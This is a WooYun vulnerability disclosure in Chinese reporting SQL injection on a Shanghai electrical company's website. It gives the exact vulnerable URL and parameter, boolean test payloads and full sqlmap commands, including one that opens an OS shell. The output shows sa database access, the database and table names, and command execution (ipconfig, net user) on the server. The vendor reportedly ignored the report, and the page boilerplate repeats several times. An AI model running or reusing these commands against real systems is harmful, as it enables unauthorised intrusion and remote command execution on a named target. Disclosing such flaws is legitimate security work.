上海奔腾电工网站存在SQL注射漏洞 | wooyun-2016-0204195| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0204195

漏洞标题：上海奔腾电工网站存在SQL注射漏洞

漏洞作者： vforbox

提交时间：2016-05-03 17:07

修复时间：2016-05-03 17:07

公开时间：2016-05-03 17:07

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：7

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2016-05-03：积极联系厂商并且等待厂商认领中，细节不对外公开
2016-05-03：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

上海奔腾电工网站存在SQL注射漏洞，可获取sa权限,远程执行命令

详细说明：

http://pcp.povos.com.cn/
http://pcp.povos.com.cn/news_detail.jsp?id=10410
后面发现是一个虚拟机，没有继续深入

漏洞证明：

and 1=1 # 返回正常
and 1=2 # 返回不正常
1. 可多语句查询注入
2. 布尔型注入
放sqlmap跑

---
sqlmap -u "http://pcp.povos.com.cn/news_detail.jsp?id=10410" --batch --current-user --dbs  -D pcpside --tables --time-sec 3
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=10058 AND 6032=6032
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: id=10058;WAITFOR DELAY '0:0:5'--
---
[21:18:42] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2005
current user:    'sa'
available databases [6]:
[*] master
[*] model
[*] msdb
[*] MsReport
[*] pcpside
[*] tempdb
Database: pcpside
[36 tables]
+------------------+
| BBS_Cate         |
| BBS_arrest       |
| D99_CMD          |
| D99_REG          |
| D99_Tmp          |
| WCRTEMP00001     |
| WCRTEMP00002     |
| bbsmenu          |
| bbstitle         |
| clubuser         |
| config           |
| dtproperties     |
| kill_kk          |
| r3dm0v3_sql      |
| sms              |
| sqlmapfile       |
| sqlmapoutput     |
| t_6s             |
| t_6s_class       |
| t_career         |
| t_culture        |
| t_download       |
| t_download_class |
| t_hr             |
| t_hr_class       |
| t_jiaozhu        |
| t_ly             |
| t_ly_class       |
| t_news           |
| t_news_class     |
| t_notice         |
| t_notice_class   |
| t_product        |
| t_product_class  |
| t_user           |
| t_verify         |
+------------------+

sqlmap -u "http://pcp.povos.com.cn/news_detail.jsp?id=10410" --batch --os-shell
os-shell> ipconfig
Windows IP Configuration
Ethernet adapter 本地连接 6:
   Connection-specific DNS Suffix  . : 
   IP Address. . . . . . . . . . . . : 192.168.10.5
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.10.254
   
os-shell> net user
\\ 的用户帐户
-------------------------------------------------------------------------------
Acronis Agent User       Administrator
Guest
SUPPORT_388945a0  
       
命令运行完毕。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0204195

漏洞标题：上海奔腾电工网站存在SQL注射漏洞

相关厂商：上海奔腾电工

漏洞作者： vforbox

提交时间：2016-05-03 17:07

修复时间：2016-05-03 17:07

公开时间：2016-05-03 17:07

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：7

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 vforbox@乌云

漏洞回应

厂商回应：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0204195

漏洞标题：上海奔腾电工网站存在SQL注射漏洞

相关厂商：上海奔腾电工

漏洞作者： vforbox

提交时间：2016-05-03 17:07

修复时间：2016-05-03 17:07

公开时间：2016-05-03 17:07

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：7

漏洞状态：未联系到厂商或者厂商积极忽略

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2016-0204195"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 vforbox@乌云

漏洞回应

厂商回应：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：